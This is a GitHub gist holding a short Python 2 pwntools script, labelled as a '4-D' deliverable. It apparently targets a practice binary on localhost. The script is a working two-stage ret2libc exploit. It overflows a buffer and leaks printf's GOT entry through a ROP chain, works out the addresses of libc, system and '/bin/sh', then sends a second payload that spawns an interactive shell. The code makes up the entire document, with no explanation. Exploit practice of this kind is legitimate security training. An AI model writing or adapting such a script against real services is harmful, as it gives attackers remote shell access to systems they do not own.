Skip to content

Instantly share code, notes, and snippets.

@Tosainu
Last active August 15, 2016 12:27
Show Gist options
  • Save Tosainu/72d306c3388ff0f39ef929eb7df17c46 to your computer and use it in GitHub Desktop.
Save Tosainu/72d306c3388ff0f39ef929eb7df17c46 to your computer and use it in GitHub Desktop.
4-D成果物. Python2で動きます.
from pwn import *
def p(x):
return struct.pack('<I', x)
main = 0x804849d
popret = 0x804856f
printf_plt = 0x8048360
printf_got = 0x804a010
printf_offset = 0x004cdd0
system_offset = 0x003fe70
bin_sh_offset = 0x015da8c
s = remote('localhost', 4000)
payload = ''.join([
'A' * 44,
p(printf_plt),
p(popret),
p(printf_got),
p(main),
])
s.send(payload)
print s.recvuntil('!\n')
leak = s.recv(64)
print 'Leaked:', leak
printf_addr = u32(leak[:4])
libc_base = printf_addr - printf_offset
system_addr = libc_base + system_offset
bin_sh_addr = libc_base + bin_sh_offset
print '[+] libc %x' % libc_base
payload2 = b''.join([
'A' * 44,
p(system_addr),
b'BBBB',
p(bin_sh_addr),
])
s.send(payload2)
s.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment